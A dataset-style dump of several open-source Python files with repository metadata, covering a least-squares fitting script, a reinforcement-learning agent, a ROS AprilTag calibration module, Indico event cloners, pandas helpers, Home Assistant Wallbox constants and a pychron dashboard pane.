sum_x_2 = np.sum([x_i**2 for x_i in x])
sum_x_y = np.sum([x_i*y_i for x_i, y_i in zip(x, y)])
# Linear least squares fit given by y = w1x + w0
w1 = (N*sum_x_y - sum_x*sum_y)/(N*sum_x_2 - sum_x**2)
w0 = (sum_y - w1*sum_x)/N
print(w1, w0)
# Plot
plt.figure()
plt.xlabel('x axis')
plt.ylabel('y axis')
plt.title('Linear Least Squares Fit')
plt.scatter(x, y)
plt.plot(x, w0 + w1 * x, 'r')
## Linear least squares fit using Gradient Descent
def gradient_function(w0, w1):
# Objective function = \sum_{i=1}{50} (y_i - w0 - w1*x_i)**2
pred = w0 + w1 * x
g_w0 = 2 * np.sum(pred - y)
g_w1 = 2 * (pred - y) @ x
return [g_w0, g_w1]
# initialize parameters
w0_i, w1_i = np.random.uniform(0, 1, 2)
w0_arr, w1_arr, E = [], [], []
iterations = 0; eta = 1e-5
w0 = w0_i; w1 = w1_i
# gradient descent loop
while iterations < 1000:
g = gradient_function(w0, w1)
w0 = w0 - eta * g[0]
w1 = w1 - eta * g[1]
iterations += 1
E.append(np.sum((y - w0 - w1*x)**2)) # Energy function
print(w1, w0)
# plot
plt.plot(x, w0 + w1 * x, 'g')
plt.legend(['Closed form solution', 'Gradient Descent', 'Actual Datapoints'])
plt.savefig('least_squares_fit.pdf')
| 25.927273
| 77
| 0.61641
|
ecc52f66d38fd33512f18675798eca6e7b63a622
| 5,503
|
py
|
Python
|
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
from control4.core.optimizable_agent import OptimizableAgent
from control4.core.cpd import DiagonalGaussian
from control4.config import floatX, resolve_cfg_loc
from control4.nn.nn import MLP
from control4.algs.alg_params import string2dict
import json, numpy as np
import theano,theano.tensor as TT #pylint: disable=F0401
class NNReactiveAgent(OptimizableAgent):
def __init__(self,mdp,policy_cfg, vf_cfg):
self._has_vf = vf_cfg is not None
pol_hid_sizes = policy_cfg.pop("hidden_layer_sizes",[25,25])
pol_nonlinearity = policy_cfg.pop("nonlinearity","soft_rect")
initial_stdev = policy_cfg.pop("initial_stdev", 0.5)
self.clip_features = policy_cfg.pop("clip_features",False)
self.clip_value = policy_cfg.pop("clip_value",5.0)
self.vf_scaling = policy_cfg.pop("vf_scaling",100.0)
if len(policy_cfg)>0:
print "WARNING: didn't use parameters %s"%policy_cfg.keys()
input_size = mdp.output_size("o")
n_net_out = mdp.input_size("u")
try:
lo,hi = mdp.obs_ranges()
except (NameError,NotImplementedError):
print "NNReactiveAgent: generating scaling data"
from control4.agents.gen_scaling_data import gen_scaling_data
lo,hi = gen_scaling_data(mdp)
lo -= 0.01 # TODO: Fix feature selection problem properly
hi += 0.01
input_trans = ((hi+lo)/2)[None,:]
input_scaling = ((hi-lo)/2)[None,:]
assert np.allclose( (np.array([lo,hi])- input_trans)/input_scaling,np.array([[-1],[1]]),atol=1e-3)
self.input_scaling = theano.shared(input_scaling,name="input_scaling")
self.input_trans = theano.shared(input_trans,name="input_trans")
self.input_scaling.type.broadcastable=(True,False)
self.input_trans.type.broadcastable=(True,False)
lo,hi = mdp.ctrl_bounds()
self.output_scaling = (hi-lo)/2
self.output_trans = (hi+lo)/2
assert np.allclose(self.output_scaling[None,:]*np.array([[-1],[1]])+self.output_trans[None,:],np.array([lo,hi]))
self._cpd = DiagonalGaussian( n_net_out )
self._input_info = {
"o" : mdp.output_info()["o"]
}
self._output_info = {
"a" : (n_net_out, floatX),
"b" : (n_net_out,floatX),
"q" : (None, floatX),
"u" : (n_net_out, floatX)
}
if self._has_vf: self._output_info["v"] = (None,floatX)
pol_n_hid = len(pol_hid_sizes)
init_col_norms = [1.0] * pol_n_hid + [0.01]
# Hidden layers
self.net = MLP([input_size] + pol_hid_sizes + [n_net_out],[pol_nonlinearity]*pol_n_hid + ["none"],
["input"] + ["hid%i"%i for i in xrange(pol_n_hid)] + ["output"],init_col_norms=init_col_norms)
if self._has_vf:
vf_hid_sizes = vf_cfg.pop("hidden_layer_sizes",[25,25])
vf_n_hid = len(vf_hid_sizes)
vf_nonlinearity = vf_cfg.pop("nonlinearity","soft_rect")
if len(vf_cfg)>0:
print "WARNING: didn't use parameters %s"%vf_cfg.keys()
init_col_norms = [1.0] * vf_n_hid + [0.01]
self.vf_net = MLP([input_size] + vf_hid_sizes + [1],[vf_nonlinearity]*vf_n_hid + ["none"],
["vfinput"] + ["vfhid%i"%i for i in xrange(vf_n_hid)] + ["vfoutput"],init_col_norms=init_col_norms)
stdev_init = np.ones(n_net_out,floatX)*initial_stdev
self.logstdev = theano.shared(np.log(stdev_init),name="logstdev")
OptimizableAgent.__init__(self,mdp)
def lag_array_names(self):
return []
def input_info(self):
return self._input_info
def output_info(self):
return self._output_info
def initialize_lag_arrays(self):
return {}
################################
def ponder(self, input_dict):
o = input_dict["o"]
o = (o - self.input_trans) / self.input_scaling
if self.clip_features:
o = o.clip(-self.clip_value, self.clip_value)
# std = TT.repeat(TT.exp(self.logstdev.reshape((1,-1))), o.shape[0], axis=0)
std = TT.exp(self.logstdev.reshape((1,-1))) + TT.zeros([o.shape[0],1],floatX)
out = {"a":TT.concatenate([self.net(o),std],axis=1)}
if self._has_vf:
out["v"] = self.vf_net(o)[:,0]*self.vf_scaling
return out
def cpd(self):
return self._cpd
def b2u(self,b_nb):
# because b[0] is in [0,1,2], but action.horiz is in [-1,0,1]
return b_nb*self.output_scaling + self.output_trans
def policy_vars(self):
return self.net.opt_vars() + [self.logstdev]
def vf_vars(self):
return self.vf_net.opt_vars() if self._has_vf else []
def extra_vars(self):
return self.net.extra_vars() + [self.input_scaling, self.input_trans]
def construct(params,mdp):
if params.get("policy_cfg"):
with open(resolve_cfg_loc(params["policy_cfg"]),"r") as fh:
policy_cfg = json.load(fh)
else:
policy_cfg = {}
policy_cfg.update(string2dict(params.get("policy_kws","")))
if params.get("vf_opt_mode") == "separate":
if params.get("vf_cfg"):
with open(resolve_cfg_loc(params["vf_cfg"]),"r") as fh:
vf_cfg = json.load(fh)
else:
vf_cfg = {}
vf_cfg.update(string2dict(params.get("vf_kws","")))
else:
vf_cfg = None
return NNReactiveAgent(mdp, policy_cfg, vf_cfg)
| 35.96732
| 120
| 0.612393
|
9cfa34015599bf366ed70c5d7f98ade4dbbe1c65
| 8,302
|
py
|
Python
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 8
|
2021-08-24T15:27:33.000Z
|
2022-03-13T10:44:54.000Z
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 4
|
2021-07-26T18:42:05.000Z
|
2022-02-15T17:23:18.000Z
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 9
|
2021-06-03T08:12:04.000Z
|
2022-02-16T01:53:24.000Z
|
import rospy
import numpy as np
import tf2_ros
from geometry_msgs.msg import TransformStamped, Quaternion, Point
from tf.transformations import euler_from_quaternion, quaternion_from_euler
from interbotix_perception_modules.apriltag import InterbotixAprilTagInterface
from interbotix_common_modules import angle_manipulation as ang
### @brief A module to find an arm's base link frame relative to some reference frame (using the help of the AprilTag on the arm)
### @param armtag_ns - namespace where the ROS parameters needed by the module are located
### @param apriltag_ns - namespace where the ROS parameters needed by the InterbotixAprilTagInterface module are located
### @param init_node - whether or not the module should initalize a ROS node; set to False if a node was already initalized somwhere else
class InterbotixArmTagInterface(object):
def __init__(self, armtag_ns="armtag", apriltag_ns="apriltag", init_node=False):
if (init_node):
rospy.init_node(armtag_ns.strip("/") + "_interface")
self.arm_tag_frame = rospy.get_param("/" + armtag_ns + "/arm_tag_frame")
self.ref_frame = rospy.get_param("/" + armtag_ns + "/ref_frame")
self.arm_base_frame = rospy.get_param("/" + armtag_ns + "/arm_base_frame")
self.trans = TransformStamped()
self.trans.header.frame_id = self.ref_frame
self.trans.child_frame_id = self.arm_base_frame
self.trans.transform.rotation.w = 1.0
self.rpy = [0,0,0]
self.apriltag = InterbotixAprilTagInterface(apriltag_ns, False)
print("Initialized InterbotixArmTagInterface!\n")
### @brief Snaps an image of the AprilTag, then computes the transform of the robot's base_link frame w.r.t. the desired reference frame
### @param ref_frame - desired reference frame; defaults to self.ref_frame if not specified
### @param arm_base_frame - desired base_link frame (either the arm's actual base_link frame or a parent frame); defaults to self.arm_base_frame if not specified
### @param num_samples - number of AprilTag snapshots to take before averaging them to get a more accurate pose
### @param position_only - if True, only the x,y,z position of the snapped AR tag will be considered; if False, the orientation of the AR tag will be used as well
### @details - the 'position_only' parameter can only be set to True if there already exists a 'tf' path from the camera color frame to the AR tag frame on the arm;
### it can be used to try to get a more accurate position of the AR tag than what is dictated by the URDF
def find_ref_to_arm_base_transform(self, ref_frame=None, arm_base_frame=None, num_samples=5, position_only=False):
if ref_frame == None:
ref_frame = self.ref_frame
if arm_base_frame == None:
arm_base_frame = self.arm_base_frame
# take the average pose (w.r.t. the camera frame) of the AprilTag over 'num_samples' samples
point = Point()
rpy = [0, 0, 0]
for x in range(num_samples):
ps = self.apriltag.find_pose()
point.x += ps.position.x / float(num_samples)
point.y += ps.position.y / float(num_samples)
point.z += ps.position.z / float(num_samples)
quat_sample = ps.orientation
quat_list = [quat_sample.x, quat_sample.y, quat_sample.z, quat_sample.w]
rpy_sample = euler_from_quaternion(quat_list)
rpy[0] += rpy_sample[0] / float(num_samples)
rpy[1] += rpy_sample[1] / float(num_samples)
rpy[2] += rpy_sample[2] / float(num_samples)
T_CamTag = ang.poseToTransformationMatrix([point.x, point.y, point.z, rpy[0], rpy[1], rpy[2]])
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
# If position_only, set the orientation of the found AR tag to be equivalent to the orientation of the arm's AR tag as dictated by the URDF
if (position_only):
T_CamActualTag = self.get_transform(tfBuffer, self.apriltag.image_frame_id, self.arm_tag_frame)
T_CamTag[:3,:3] = T_CamActualTag[:3,:3]
# Now, get a snapshot of the pose of arm's base_link frame w.r.t. the AR tag link (as defined in the URDF - not the one found by the algorithm)
# We can't publish the AR tag pose found using the AprilTag algorithm to the /tf tree since ROS forbids a link to have multiple parents
T_TagBase = self.get_transform(tfBuffer, self.arm_tag_frame, arm_base_frame)
# Now, lets find the transform of the arm's base_link frame w.r.t. the reference frame
T_CamBase = np.dot(T_CamTag, T_TagBase)
if ref_frame == self.apriltag.image_frame_id:
T_RefBase = T_CamBase
else:
T_RefCam = self.get_transform(tfBuffer, ref_frame, self.apriltag.image_frame_id)
T_RefBase = np.dot(T_RefCam, T_CamBase)
# Now, we can publish the transform from the reference link to the arm's base_link legally as the arm's base_link has no parent
# (or even if it does, we can safely overwrite it since the 'tf' tree will remain intact)
self.rpy = ang.rotationMatrixToEulerAngles(T_RefBase[:3,:3])
quat = quaternion_from_euler(self.rpy[0], self.rpy[1], self.rpy[2])
self.trans = TransformStamped()
self.trans.transform.translation.x = T_RefBase[0,3]
self.trans.transform.translation.y = T_RefBase[1,3]
self.trans.transform.translation.z = T_RefBase[2,3]
self.trans.transform.rotation = Quaternion(quat[0], quat[1], quat[2], quat[3])
self.trans.header.frame_id = ref_frame
self.trans.child_frame_id = arm_base_frame
self.trans.header.stamp = rospy.Time.now()
self.apriltag.pub_transforms.publish(self.trans)
### @brief Helper function to lookup a transform and convert it into a 4x4 transformation matrix
### @param tfBuffer - tf2_ros buffer instance from which to lookup transforms from the 'tf' tree
### @param target_frame - the frame to which data should be transformed
### @param source_frame - the frame where the data originated
### @return T_TargetSource - desired 4x4 numpy transformation matrix
def get_transform(self, tfBuffer, target_frame, source_frame):
try:
trans = tfBuffer.lookup_transform(target_frame, source_frame, rospy.Time(0), rospy.Duration(4.0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.logerr("Failed to look up the transform from '%s' to '%s'." % (target_frame, source_frame))
return np.identity(4)
x = trans.transform.translation.x
y = trans.transform.translation.y
z = trans.transform.translation.z
quat = trans.transform.rotation
quat_list = [quat.x, quat.y, quat.z, quat.w]
rpy = euler_from_quaternion(quat_list)
T_TargetSource = ang.poseToTransformationMatrix([x, y, z, rpy[0], rpy[1], rpy[2]])
return T_TargetSource
### @brief Get the 'x' component of T_RefBase
### @return 'x' [m]
def get_x(self):
return self.trans.transform.translation.x
### @brief Get the 'y' component of T_RefBase
### @return 'y' [m]
def get_y(self):
return self.trans.transform.translation.y
### @brief Get the 'z' component of T_RefBase
### @return 'z' [m]
def get_z(self):
return self.trans.transform.translation.z
### @brief Get the 'roll' component of T_RefBase
### @return 'roll' [rad]
def get_roll(self):
return self.rpy[0]
### @brief Get the 'pitch' component of T_RefBase
### @return 'pitch' [rad]
def get_pitch(self):
return self.rpy[1]
### @brief Get the 'yaw' component of T_RefBase
### @return 'yaw' [rad]
def get_yaw(self):
return self.rpy[2]
### @brief Get the parent frame of T_RefBase (usually something like 'camera_color_optical_frame')
### @return 'frame_id'
def get_parent_frame(self):
return self.trans.header.frame_id
### @brief Get the child frame of T_RefBase (usually something like 'base_link')
### @return 'child_frame_id'
def get_child_frame(self):
return self.trans.child_frame_id
| 55.346667
| 168
| 0.68622
|
d96c5c6a520004d9115a8d13381eb14b7cc10b52
| 6,134
|
py
|
Python
|
indico/modules/events/clone.py
|
EdverCompany/indico
|
c4b5e7b2e3a47355d850a342ed527c09334ef336
|
[
"MIT"
] | null | null | null |
indico/modules/events/clone.py
|
EdverCompany/indico
|
c4b5e7b2e3a47355d850a342ed527c09334ef336
|
[
"MIT"
] | 2
|
2021-05-26T09:16:52.000Z
|
2021-05-26T09:28:59.000Z
|
indico/modules/events/clone.py
|
andrea-guarino-sonarsource/indico
|
2dada1f293daea913dec85ebb33c29a9f2cb92ac
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.core.db import db
from indico.core.db.sqlalchemy.principals import clone_principals
from indico.core.db.sqlalchemy.util.models import get_simple_column_attrs
from indico.modules.events.cloning import EventCloner
from indico.modules.events.models.events import EventType
from indico.modules.events.models.persons import EventPerson, EventPersonLink
from indico.modules.events.models.principals import EventPrincipal
from indico.modules.events.sessions import session_settings
from indico.modules.events.util import track_location_changes
from indico.util.i18n import _
class EventLocationCloner(EventCloner):
name = 'event_location'
friendly_name = _('Venue/Room')
is_default = True
@property
def is_available(self):
return self._has_content(self.old_event)
def has_conflicts(self, target_event):
return self._has_content(target_event)
def run(self, new_event, cloners, shared_data, event_exists=False):
with db.session.no_autoflush:
self._clone_location(new_event)
db.session.flush()
def _has_content(self, event):
return event.has_location_info
def _clone_location(self, new_event):
with track_location_changes():
new_event.location_data = self.old_event.location_data
db.session.flush()
class EventPersonCloner(EventCloner):
name = 'event_persons'
friendly_name = _('Persons')
is_internal = True
is_default = True
# We do not override `is_available` as we have cloners depending
# on this internal cloner even if it won't clone anything.
def has_conflicts(self, target_event):
return target_event.persons.has_rows()
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = {}
with db.session.no_autoflush:
self._clone_persons(new_event)
db.session.flush()
return {'person_map': self._person_map}
def _clone_persons(self, new_event):
attrs = get_simple_column_attrs(EventPerson) | {'user'}
for old_person in self.old_event.persons:
person = EventPerson(event=new_event)
person.populate_from_attrs(old_person, attrs)
assert person not in db.session
self._person_map[old_person] = person
class EventPersonLinkCloner(EventCloner):
name = 'event_person_links'
requires = {'event_persons'}
is_default = True
@property
def friendly_name(self):
if self.old_event.type_ == EventType.lecture:
return _('Speakers')
else:
return _('Chairpersons')
@property
def is_available(self):
return self._has_content(self.old_event)
def has_conflicts(self, target_event):
return self._has_content(target_event)
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = shared_data['event_persons']['person_map']
with db.session.no_autoflush:
self._clone_person_links(new_event)
db.session.flush()
def _has_content(self, event):
return bool(event.person_links)
def _clone_person_links(self, new_event):
attrs = get_simple_column_attrs(EventPersonLink)
for old_link in self.old_event.person_links:
link = EventPersonLink()
link.populate_from_attrs(old_link, attrs)
link.person = self._person_map[old_link.person]
new_event.person_links.append(link)
class EventProtectionCloner(EventCloner):
name = 'event_protection'
friendly_name = _('ACLs and protection settings')
is_default = True
uses = {'event_roles', 'registration_forms'}
def has_conflicts(self, target_event):
if target_event.access_key != '':
return True
entries = list(target_event.acl_entries)
return len(entries) != 1 or entries[0].user != target_event.creator
def run(self, new_event, cloners, shared_data, event_exists=False):
self._event_role_map = shared_data['event_roles']['event_role_map'] if 'event_roles' in cloners else None
self._regform_map = shared_data['registration_forms']['form_map'] if 'registration_forms' in cloners else None
with db.session.no_autoflush:
self._clone_protection(new_event)
self._clone_session_coordinator_privs(new_event)
self._clone_acl(new_event, event_exists)
self._clone_visibility(new_event)
db.session.flush()
def _clone_protection(self, new_event):
new_event.protection_mode = self.old_event.protection_mode
new_event.access_key = self.old_event.access_key
def _clone_visibility(self, new_event):
new_event.visibility = self.old_event.visibility if new_event.category == self.old_event.category else None
def _clone_session_coordinator_privs(self, new_event):
session_settings_data = session_settings.get_all(self.old_event)
session_settings.set_multi(new_event, {
'coordinators_manage_contributions': session_settings_data['coordinators_manage_contributions'],
'coordinators_manage_blocks': session_settings_data['coordinators_manage_blocks']
})
def _clone_acl(self, new_event, event_exists):
if event_exists:
acl_entries = {principal for principal in self.old_event.acl_entries if principal.user != new_event.creator}
new_event.acl_entries = clone_principals(EventPrincipal, acl_entries,
self._event_role_map, self._regform_map)
db.session.flush()
new_event.update_principal(new_event.creator, full_access=True)
else:
new_event.acl_entries = clone_principals(EventPrincipal, self.old_event.acl_entries,
self._event_role_map, self._regform_map)
| 39.070064
| 120
| 0.69987
|
f6f9acfae489f2b0b4a03d4bb3c8af5c67f1dc6b
| 192
|
py
|
Python
|
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
import heapq
N, M = [int(n) for n in input().split()]
A = [-int(n) for n in input().split()]
heapq.heapify(A)
[heapq.heappush(A, -(-heapq.heappop(A)//2)) for _ in range(M)]
print(-sum(A))
| 24
| 65
| 0.604167
|
64f94e1659da4c216d9a6dad359ca083622c1b80
| 2,660
|
py
|
Python
|
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
"""
Various functions to facilitate the cleaning and formating of pandas dataframes.
This may be expanded as the need arises.
"""
import copy
import datetime
import logging
import numpy as np
log = logging.getLogger(__name__)
def convert_time_to_seconds(time_span, scale):
"""
Convert arbitrary time span to seconds.
On failure, returns 0 seconds.
Args:
time_span (str): The length of time specified by units "scale".
scale (str): The units of the length of time specified in "time_span".
Valid Entries: 'Y', 'M', 'W', 'D'
Returns:
int: Total seconds in time_span.
"""
conversion = {
"Y": 365.25,
"M": 30,
"W": 7,
"D": 1,
}
try:
seconds = datetime.timedelta(
int(time_span) * conversion.get(scale)
).total_seconds()
except ValueError:
log.warning("Error, returning 0.")
seconds = 0
return seconds
def format_sex_string(sex_str):
"""
Converts 'M', 'F', or else to 'male', 'female', or empty string (e.g. '').
Args:
sex_str (str): String consisting of 'M', 'F', '', or None.
Returns:
str: 'M', 'F', or ''
"""
if sex_str == "M":
sex = "male"
elif sex_str == "F":
sex = "female"
else:
sex = ""
return sex
def create_session_label(offset, default_session_label):
"""
Format Session label
Args:
offset (str): Number of days since the start of symptoms or hospitalization.
See SCHEMA.md.
Returns:
str: Label of Session
"""
if not offset:
label = default_session_label
elif np.isnan(offset):
label = default_session_label
else:
label = f"offset_{str(int(offset)).zfill(3)}"
return label
def cleanup_row_dict(row_dict):
"""
Cleanup session age, clinical notes, other notes, and empty values.
Args:
row_dict (dict): Raw dictionary representation of dataframe row.
Returns:
dict: Cleaned version of row_dict.
"""
# fix session age
row_dict["session_age"] = int(row_dict["session_age"])
# fix notes
if row_dict.get("Unnamed: 16"):
row_dict["clinical notes"] = "\s".join(
[row_dict["clinical notes"], row_dict["other notes"]]
)
row_dict["other notes"] = row_dict["Unnamed: 16"]
row_dict["Unnamed: 16"] = ""
# Copy row_dict
return_dict = copy.deepcopy(row_dict)
# To remove empty values
for key, value in row_dict.items():
if value in ["", None]:
return_dict.pop(key)
return return_dict
| 23.539823
| 84
| 0.589098
|
41996107ce033099b6548c71c6cb4d46404ec838
| 2,711
|
py
|
Python
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 11
|
2018-02-16T15:35:47.000Z
|
2020-01-14T15:20:00.000Z
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 79
|
2020-07-23T07:13:37.000Z
|
2022-03-22T06:02:37.000Z
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 6
|
2018-02-04T03:48:55.000Z
|
2022-01-24T20:37:04.000Z
|
"""Constants for the Wallbox integration."""
from homeassistant.const import (
CONF_ICON,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
ELECTRICAL_CURRENT_AMPERE,
ENERGY_KILO_WATT_HOUR,
LENGTH_KILOMETERS,
PERCENTAGE,
POWER_KILO_WATT,
STATE_UNAVAILABLE,
)
DOMAIN = "wallbox"
CONF_STATION = "station"
CONF_CONNECTIONS = "connections"
CONF_ROUND = "round"
CONF_SENSOR_TYPES = {
"charging_power": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Charging Power",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: POWER_KILO_WATT,
STATE_UNAVAILABLE: False,
},
"max_available_power": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Max Available Power",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: ELECTRICAL_CURRENT_AMPERE,
STATE_UNAVAILABLE: False,
},
"charging_speed": {
CONF_ICON: "mdi:speedometer",
CONF_NAME: "Charging Speed",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"added_range": {
CONF_ICON: "mdi:map-marker-distance",
CONF_NAME: "Added Range",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: LENGTH_KILOMETERS,
STATE_UNAVAILABLE: False,
},
"added_energy": {
CONF_ICON: "mdi:battery-positive",
CONF_NAME: "Added Energy",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: ENERGY_KILO_WATT_HOUR,
STATE_UNAVAILABLE: False,
},
"charging_time": {
CONF_ICON: "mdi:timer",
CONF_NAME: "Charging Time",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"cost": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Cost",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"state_of_charge": {
CONF_ICON: "mdi:battery-charging-80",
CONF_NAME: "State of Charge",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: PERCENTAGE,
STATE_UNAVAILABLE: False,
},
"current_mode": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Current Mode",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"depot_price": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Depot Price",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"status_description": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Status Description",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
}
| 27.11
| 60
| 0.618591
|
cd6b1fff3e554f09daaa5b0da4a4873248accd41
| 437
|
py
|
Python
|
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | null | null | null |
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | null | null | null |
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | 1
|
2020-10-22T09:48:20.000Z
|
2020-10-22T09:48:20.000Z
|
"""\
This package is mainly for people who want to code with python around osu, but doesn't want to write anything
Using this packag for code that I tend to rewrite a lot such as `requests` type code.
"""
__title__ = 'coover'
__author__ = 'coverosu'
__license__ = 'MIT'
__copyright__ = 'Copyright 2020 coverosu'
__version__ = '0.1'
from .OsuAPIWrapper import *
from .Beatmap import *
from .OsuApiV2 import *
from .replayparser import *
| 29.133333
| 109
| 0.750572
|
fb1c3656dabbec2198d8230719062062e4a20056
| 3,150
|
py
|
Python
|
pychron/dashboard/tasks/server/panes.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 1
|
2019-02-27T21:57:44.000Z
|
2019-02-27T21:57:44.000Z
|
pychron/dashboard/tasks/server/panes.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/dashboard/tasks/server/panes.py
|
AGESLDEO/pychron
|
1a81e05d9fba43b797f335ceff6837c016633bcf
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from pyface.tasks.traits_dock_pane import TraitsDockPane
from pyface.tasks.traits_task_pane import TraitsTaskPane
from traitsui.api import View, UItem, VGroup, HGroup, Group, VSplit
# ============= standard library imports ========================
# ============= local library imports ==========================
from traitsui.editors import TableEditor, InstanceEditor, ListEditor
from traitsui.extras.checkbox_column import CheckboxColumn
from traitsui.table_column import ObjectColumn
from pychron.core.ui.custom_label_editor import CustomLabel
class DashboardCentralPane(TraitsTaskPane):
def traits_view(self):
url = CustomLabel('object.notifier.url', label='URL')
agrp = VGroup(UItem('devices', editor=ListEditor(mutable=False,
style='custom',
editor=InstanceEditor(
view=View(UItem('graph', style='custom'))))), label='All')
igrp = VGroup(UItem('selected_device', style='custom'), label='Individual')
tgrp = HGroup(url, UItem('clear_button', tooltip='Clear current errors'))
# v = View(
# VGroup(HGroup(url, UItem('clear_button', tooltip='Clear current errors')),
# UItem('selected_device',
# style='custom'),
#
# )))
v = View(VGroup(tgrp, Group(agrp, igrp, layout='tabbed')))
return v
class DashboardDevicePane(TraitsDockPane):
id = 'pychron.dashboard.devices'
def traits_view(self):
cols = [CheckboxColumn(name='use'),
ObjectColumn(name='name', editable=False)]
editor = TableEditor(columns=cols,
selected='selected_device')
cols = [ObjectColumn(name='name', label='Name'),
ObjectColumn(name='last_value', label='Value'),
ObjectColumn(name='last_time_str', label='Timestamp')]
veditor = TableEditor(columns=cols,
editable=False)
v = View(VSplit(UItem('devices', editor=editor),
UItem('values', editor=veditor)))
return v
# ============= EOF =============================================
| 42.567568
| 119
| 0.564127
|
b48bfde97f334bbe87b1183363efa1ccfd0ca715
| 8,444
|
py
|
Python
|
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
